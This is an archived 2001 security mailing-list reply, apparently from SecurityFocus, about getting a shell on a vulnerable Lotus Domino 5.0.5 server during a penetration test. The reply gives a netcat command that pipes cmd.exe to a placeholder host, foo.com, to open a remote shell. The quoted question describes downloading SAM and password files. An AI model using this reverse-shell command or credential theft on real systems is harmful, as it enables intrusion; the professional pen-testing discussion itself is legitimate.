Re: Hacking Lotus Domino 5.0.5

From: 'ken'@FTU
Date: Mon Oct 15 2001 - 16:33:31 PDT

Next message: Jon O .: "Re: Securing VOIP?"

Previous message: Dave Aitel: "New Tool Release: Sharefuzz"
In reply to: renato.ettisbergerat_private: "Hacking Lotus Domino 5.0.5"
Next in thread: jjoreat_private: "Re: Hacking Lotus Domino 5.0.5"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I suspect from your email that your Domino server is on an NT box as 
opposed to an AS/400.

If it's a 400 your somewhat out of luck because few, if any, tools exist 
for 400 hacking.

If its NT here's an idea:
  If you can place a file on the machine put netcat on the machine.You 
can  then get a shell back with the command: nc foo.com [your inbound 
port] | cmd.exe | nc foo.com [your outbount port]
you can now send commands to your inbound port and watch the result on 
your out bound port.

You can always search for buffer overflows. If one is found you could 
possibly excute commands, or do other stuff, within the server's 
permission level.

Hope this helps.

'ken'

renato.ettisbergerat_private wrote:

> Hi
> 
> I'm doing a pen test for a client. They have many systems in the dmz,
> including some nt/win2k boxes running IIS. Unfortunately, all IIS are
> patched :-(. But I found a vulnerable Domino 5.0.5 Server. I was able to
> download some nice files like names.nsf, the sam-file in winnt/repair and a
> admin.nsf with all user names and passwords. I think, that's a finding :-),
> but I want more.
> Is there a way to get a shell? I'm able to create files on the server or at
> least I can fill out a question form. Can I use this to create a file or
> execute a command (I don't think so, but maybe...)? Or does anybody know
> some other stuff, that I can do?
> 
> As you can see, I'm not a pro in Lotus Domino.
> 
> Thanks for your help
> 
> regards
> Renato
> ----------------------------------------------------------------
> The information transmitted is intended only for the person or entity to
> which it is addressed and may contain confidential and/or privileged
> material.  Any review, retransmission, dissemination or other use of, or
> taking of any action in reliance upon, this information by persons or
> entities other than the intended recipient is prohibited.   If you received
> this in error, please contact the sender and delete the material from any
> computer.
> 
> 
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
> Service. For more information on SecurityFocus' SIA service which
> automatically alerts you to the latest security vulnerabilities please see:
> https://alerts.securityfocus.com/
> 
> 




----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Next message: Jon O .: "Re: Securing VOIP?"
Previous message: Dave Aitel: "New Tool Release: Sharefuzz"
In reply to: renato.ettisbergerat_private: "Hacking Lotus Domino 5.0.5"
Next in thread: jjoreat_private: "Re: Hacking Lotus Domino 5.0.5"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Oct 15 2001 - 21:31:33 PDT